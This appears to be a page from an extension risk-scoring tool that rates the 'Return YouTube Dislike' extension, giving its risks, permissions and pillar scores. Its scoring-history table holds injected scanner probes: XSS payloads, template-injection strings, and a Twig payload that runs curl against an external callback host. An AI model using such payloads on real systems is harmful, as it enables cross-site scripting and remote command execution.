Netskope Extension Risk

Detail view · rubric v3.6
← Back to catalog

Return YouTube Dislike

gebbhagfogifgggkldgodflihgfeippi
Risk Score
3.37
Risk Level: Low
Recommendation: 🟢 LOW RISK — review
Category Entertainment
Installs 5,000,000
Rating 4.5
Last updated 2026-05-02 (3 months ago)
Manifest version MV3
CSP present ❌ no
Developer selivano.d@gmail.com
Verified publisher ✅ yes
Featured by Google ✅ yes
Privacy policy link
Web Store open ↗

Top Risks

  • Privacy policy is Google's generic account policy — not scoped to this extension; admits data collection and 3rd-party sharing.
  • Developer uses free Gmail address with no business domain; brand_mention flags YouTube impersonation.
  • 4× innerHTML DOM-XSS sinks with no CSP; if API response is ever tainted, XSS possible on YouTube pages.
  • No CSP declared (MV3 so no MV2 penalty, but innerHTML sinks elevate risk in absence of CSP).
  • 5M-install blast radius means any future compromise or supply-chain attack has very wide reach.

Evidence

  • privacy_policy_generic store Policy URL is Google account policy; scope_extension=false, data_collection=true, third_party_sharing=true → +10.0 privacy.
  • brand_impersonation store brand_mention.is_impersonation=true (YouTube), confirmed_owner=false, developer_email is gmail; verified+featured cap +1.0 rep.
  • verified_publisher_featured store verified_publisher=true AND is_featured_by_google=true; reputation discounts applied but capped due to policy/monetization rules.
  • dom_xss_sinks crx 4 innerHTML assignments in content-script and popup with no CSP; FIX B applied: csp_present=false → +2.0 code quality.
  • host_permissions_scoped manifest host_permissions limited to youtube.com and returnyoutubedislikeapi.com; function-justified, no broad <all_urls>.
  • gmail_dev_no_domain store Dev email selivano.d@gmail.com; free webmail, no developer_name, no business domain; reputation floor considerations applied.
  • no_bad_hosts_no_cves crx bad_host_hits=[], affiliate_hits=[], cve_findings_raw=[], monetization_hits=[]; threat intel clean.
  • install_count_high store 5,000,000 installs; +1.0+1.0+0.5 webstore, minus 0.5 popularity-trust for rating>=4.0.

Permissions Breakdown

  • storage low Stores extension preferences locally; no sensitive data access.
  • *://*.youtube.com/* medium Host permission scoped to YouTube only; matches stated function.
  • *://returnyoutubedislikeapi.com/* low Host permission to extension's own API backend; expected for function.
  • content_scripts: *://www.youtube.com/*, *://m.youtube.com/*, *://youtube.com/* medium Script injected into all YouTube pages; risk scoped to YouTube only.

Pillar Scores

Permissions1.50
Reputation5.00
Network2.00
Webstore3.50
Maintenance0.00
Privacy10.00
Code Quality2.00
CVE Exposure0.00

Scoring History

v3.69212"();}]9562 2.91 Low review 2026-08-05
v3.6&n947355=v907098 3.28 Low review 2026-08-05
'"></script></input><img src=x onerror=alert(1)> 3.38 Low review 2026-07-29
{{7*8}} 3.68 Low review 2026-07-29
hello1 3.39 Low review 2026-07-29
v3.6"><script>B1cb(9645)</script> 3.78 Low review 2026-07-29
<th:t="${dfb}#foreach 3.14 Low review 2026-07-29
dfb__${98991*97996}__::.x 3.09 Low review 2026-07-29
dfb[[${98991*97996}]]xca 3.44 Low review 2026-07-29
<%={{={@{#{${dfb}}%> 3.32 Low review 2026-07-29
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitgbfcsfqeqx2f457.bxss.me")}} 3.54 Low review 2026-07-29
v3.6&n922171=v993874 3.05 Low review 2026-07-29
v3.6 3.37 Low review 2026-06-16

Bookkeeping

Rubric v3.6
Scored at 2026-06-16 07:36
Listing SHA 54108a5261e4…
Force block — not fired
Score recovered no
Elapsed 29.9s